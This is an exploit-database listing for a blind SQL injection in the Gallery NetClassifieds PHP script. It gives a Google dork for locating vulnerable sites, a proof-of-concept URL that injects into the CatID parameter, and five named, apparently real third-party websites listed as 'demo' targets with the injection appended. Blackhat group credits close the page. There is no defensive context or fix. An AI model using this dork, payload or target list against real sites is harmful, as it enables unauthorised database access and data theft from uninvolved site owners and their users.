[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Gallery NetClassifieds Blind SQL Injection

Author
Spy_w4r3
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19299
Category
web applications
Date add
31-08-2012
Platform
php
:----------------------------------------------------------------------------------------------------------------------------------------------:
Gallery NetClassifieds Blind SQL Injection
:----------------------------------------------------------------------------------------------------------------------------------------------:
.___            .___                          .__                __________.__                 __     ___ ___         __   
|   | ____    __| _/____   ____   ____   _____|__|____    ____   \______   \  | _____    ____ |  | __/   |   \_____ _/  |_ 
|   |/    \  / __ |/  _ \ /    \_/ __ \ /  ___/  \__  \  /    \   |    |  _/  | \__  \ _/ ___\|  |/ /    ~    \__  \\   __\
|   |   |  \/ /_/ (  <_> )   |  \  ___/ \___ \|  |/ __ \|   |  \  |    |   \  |__/ __ \\  \___|    <\    Y    // __ \|  |  
|___|___|  /\____ |\____/|___|  /\___  >____  >__(____  /___|  /  |______  /____(____  /\___  >__|_ \\___|_  /(____  /__|  
         \/      \/           \/     \/     \/        \/     \/          \/          \/     \/     \/      \/      \/      

:----------------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title: Gallery NetClassifieds Blind SQL Injection
: # Date: 30 August 2012
: # Author: Spy_w4r3
: # Vendor or Software Link: http://www.scriptdevelopers.net
: # Version : All version
: # Category : Web Applications
: # Google dork: inurl:"gallery.php?catID=" intext:"Powered by NetClassifieds"
: # Vulnerability : SQL Injection Vulnerability
: # Tested On : Mozilla Firefox 14.0.1 (Windows)
: # Greetz to : dr.spyc0d3r, syafm0vic007, budi_spielberg, zee.eichel, Xsan Lahci, Presiden, b0y_id, ono_efeyu, wahyu_ade10, And Thia
:----------------------------------------------------------------------------------------------------------------------------------------------:

# DORKS
:----------------------------------------------------------------------------------------------------------------------------------------------:
inurl:"gallery.php?catID=" intext:"Powered by NetClassifieds"

# Proof of Concept
:----------------------------------------------------------------------------------------------------------------------------------------------:
SQL Injection : http://victim site/<path>/gallery.php?CatID=['SQL]

# Demo site: 
:----------------------------------------------------------------------------------------------------------------------------------------------:
http://netclassifiedspremiumdemo.com/gallery.php?CatID=1'
http://www.ahoy.hu/store/gallery.php?CatID=246'
http://akis.altervista.org/annunci/gallery.php?CatID=3'
http://irvingtxdirectory.com/ads/gallery.php?CatID=6'
http://anunciaygana.host56.com/gallery.php?CatID=9'

# Credits 
:----------------------------------------------------------------------------------------------------------------------------------------------:
http://indonesianblackhat.web.id | http://indonesianbacktrack.or.id



#  0day.today [2024-12-25]  #